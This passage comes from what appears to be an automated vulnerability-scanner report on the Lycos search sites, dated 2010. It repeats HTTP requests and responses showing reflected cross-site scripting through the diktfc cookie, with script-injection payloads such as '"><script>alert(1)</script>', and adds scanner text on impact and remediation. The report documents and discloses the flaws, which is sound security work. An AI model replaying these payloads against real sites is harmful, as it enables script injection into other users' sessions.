Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e7"><script>alert(1)</script>527175ce7c7; PENTA=174.121.222.18.1292163891850882
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Term ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/tos.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e7"><script>alert(1)</script>527175ce7c7.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53348"><script>alert(1)</script>06140d2ed1c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?tab=people HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A53348"><script>alert(1)</script>06140d2ed1c; PENTA=174.121.222.18.1292163893857460
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19456
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=peoplesearch.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A53348"><script>alert(1)</script>06140d2ed1c.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93dbb"%3balert(1)//50c42141ad8 was submitted in the diktfc cookie. This input was echoed as 93dbb";alert(1)//50c42141ad8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?tab=people HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A93dbb"%3balert(1)//50c42141ad8; PENTA=174.121.222.18.1292163893857460
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19426
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b77ec"><script>alert(1)</script>002fe144ca0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bootstrap.js HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab77ec"><script>alert(1)</script>002fe144ca0; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=peoplesearch.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab77ec"><script>alert(1)</script>002fe144ca0.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd2fc"%3balert(1)//805be358977 was submitted in the diktfc cookie. This input was echoed as fd2fc";alert(1)//805be358977 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bootstrap.js HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd2fc"%3balert(1)//805be358977; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19417
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af04"><script>alert(1)</script>ad74ead34bd was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /frontdoor HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1af04"><script>alert(1)</script>ad74ead34bd; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=peoplesearch.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1af04"><script>alert(1)</script>ad74ead34bd.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2a6"%3balert(1)//a9d857a500e was submitted in the diktfc cookie. This input was echoed as ef2a6";alert(1)//a9d857a500e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /frontdoor HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aef2a6"%3balert(1)//a9d857a500e; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:34:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19414
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea545"><script>alert(1)</script>6004c137ca9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aea545"><script>alert(1)</script>6004c137ca9; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=peoplesearch.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aea545"><script>alert(1)</script>6004c137ca9.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d566a"%3balert(1)//48efc52aeab was submitted in the diktfc cookie. This input was echoed as d566a";alert(1)//48efc52aeab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.php HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad566a"%3balert(1)//48efc52aeab; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19414
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c82a1"%3balert(1)//5ed61034d11 was submitted in the diktfc cookie. This input was echoed as c82a1";alert(1)//5ed61034d11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?tab=web&query=%27&x=0&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac82a1"%3balert(1)//5ed61034d11; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:25 GMT; path=/
Set-Cookie: LYCOS_SEARCH=587lfmk59vbrkvafqo83kut8a3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19195
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a339"><script>alert(1)</script>9a100a5a9b2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?tab=web&query=%27&x=0&y=0 HTTP/1.1
Host: search.lycos.com
Proxy-Connection: keep-alive
Referer: http://www.lycos.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6a339"><script>alert(1)</script>9a100a5a9b2; PENTA=174.121.222.18.1292163893857460; __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.4.10.1292163855
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:24 GMT; path=/
Set-Cookie: LYCOS_SEARCH=ncif4d92tcnpmqlnmaatquk415; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19225
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=search.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6a339"><script>alert(1)</script>9a100a5a9b2.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6059"><script>alert(1)</script>3164d47745a was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bootstrap.js HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab6059"><script>alert(1)</script>3164d47745a; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:35:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:08 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17177
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=search.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab6059"><script>alert(1)</script>3164d47745a.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36a0b"%3balert(1)//178a733ee57 was submitted in the diktfc cookie. This input was echoed as 36a0b";alert(1)//178a733ee57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bootstrap.js HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A36a0b"%3balert(1)//178a733ee57; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:35:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:09 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17147
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 599d1"><script>alert(1)</script>8a2ede2f521 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /default.asp HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A599d1"><script>alert(1)</script>8a2ede2f521; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.4.10.1292163890;
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:35:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:35:13 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17165
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search</tit ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=search.lycos.com/index.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A599d1"><script>alert(1)</script>8a2ede2f521.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2feaa"%3balert(1)//caad74f47b6 was submitted in the diktfc cookie. This input was echoed as 2feaa";alert(1)//caad74f47b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
